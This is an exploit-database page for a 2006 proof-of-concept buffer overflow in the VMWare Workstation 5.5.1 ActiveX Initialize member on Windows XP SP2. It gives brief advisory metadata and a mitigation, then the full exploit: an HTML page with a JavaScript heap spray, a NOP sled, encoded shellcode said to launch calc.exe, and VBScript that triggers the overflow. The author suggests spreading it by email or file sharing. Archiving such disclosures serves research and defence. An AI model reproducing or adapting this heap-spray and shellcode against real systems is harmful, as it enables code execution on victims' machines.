header-logo
Suggest Exploit
vendor:
VMWare Workstation
by:
c0ntex
7.5
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: VMWare Workstation
Affected Version From: VMWare 5.5.1
Affected Version To: VMWare 5.5.1
Patch Exists: Yes
Related CWE: N/A
CPE: a:vmware:vmware_workstation
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP Pro SP2
2006

WinXP Pro SP2 lame local VMWare Buffer Overflow

This exploit will overflow and execute calc.exe on WinXP Pro SP2 (fully patched) against VMWare 5.5.1 Initialize ActiveX member. The exploit uses a bad solution to this bug, where a huge buffer is filled with the address (pointer) to the evil buffer, which then trampolines to shellcode.

Mitigation:

Update to the latest version of VMWare
Source

Exploit-DB raw data:

/*
 *****************************************************************************************************************
  $ An open security advisory #17 - VMWare ActiveX lame local overflow
 *****************************************************************************************************************
  1: Bug Researcher: c0ntex - c0ntexb[at]gmail.com -+- www.open-security.org
  2: Bug Released: August 18th or so... 2006
  3: Bug Impact Rate: Code execution
  4: Bug Scope Rate: Local 
 *****************************************************************************************************************
  $ This advisory and/or proof of concept code must not be used for commercial gain.
 *****************************************************************************************************************


 VMWare
 http://vmware.com

 "Revolutionize software development, testing and deployment in your enterprise with powerful virtual
 machine software for developers and system administrators. VMware Workstation delivers powerful
 virtual machine software for the technical professional."

 Since this is a local only for ActiveX component, it requires being emailed or distribution via some
 p2p file share network or p2p chat networks. Pretty useless :)

*/


<html>
<head>
<title>WinXP Pro SP2 lame local VMWare Buffer Overflow</title>
</head>
<body>
<center>
<br>
Discovered and developed by c0ntex - c0ntexb@gmail.com<br>
Visit my website at http://www.open-security.org<br>
<br>
<h3>
This will exploit overflow and execute calc.exe on WinXP Pro SP2<br>
(fully patched) against VMWare 5.5.1 Initialize ActiveX member.<br>
</h3>
I have only found a bad solution to this bug. Due to the fact that<br>
my controlling assembler is a call dword ptr[reg] I need to point<br>
to a location I control, fine. However my payload is random pretty<br>
much every run. Therefor I fill half a HUGE  buffer with the address<br>
(pointer) to my evil buffer, which them trampolines me to shellcode<br>
<br>
call ptr [reg]<br>
[reg] -> 0xtrampoline<br>
0xtrampoline -> shellcode<br>
<br>
</center>
<script>
var buffa1 = unescape("%uedb0%u0d91") 
do {
buffa1 += buffa1;
}
while (buffa1.length < 0x500000);
var buffa2 = unescape("%u9090%u9090") 
do {
buffa2 += buffa2;
}
while (buffa2.length < 0x800000);
buffa1 += buffa2;
buffa1 += unescape("%u9090%u9090%u9090%uC929%uE983%uD9DB%uD9EE%u2474" +
"%u5BF4%u7381%uA913%u4A67%u83CC%uFCEB%uF4E2%u8F55" +
"%uCC0C%u67A9%u89C1%uEC95%uC936%u66D1%u47A5%u7FE6" +
"%u93C1%u6689%u2FA1%u2E87%uF8C1%u6622%uFDA4%uFE69" +
"%u48E6%u1369%u0D4D%u6A63%u0E4B%u9342%u9871%u638D" +
"%u2F3F%u3822%uCD6E%u0142%uC0C1%uECE2%uD015%u8CA8" +
"%uD0C1%u6622%u45A1%u43F5%u0F4E%uA798%u472E%u57E9" +
"%u0CCF%u68D1%u8CC1%uECA5%uD03A%uEC04%uC422%u6C40" +
"%uCC4A%uECA9%uF80A%u1BAC%uCC4A%uECA9%uF022%u56F6" +
"%uACBC%u8CFF%uA447%uBFD7%uBFA8%uFFC1%u46B4%u30A7" + 
"%u2BB5%u8941%u33B5%u0456%uA02B%u49CA%uB42F%u67CC" +
"%uCC4A%uD0FF");
</script>
<object id="target" classid="clsid:F76E4799-379B-4362-BCC4-68B753D10744">
</object>
<script language="vbscript">
VmdbDb=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
VmdbPoll=200011744
target.Initialize VmdbDb, VmdbPoll
</script>
</body>

# milw0rm.com [2006-08-27]

Navigation

Suggest Exploit

Services By CQR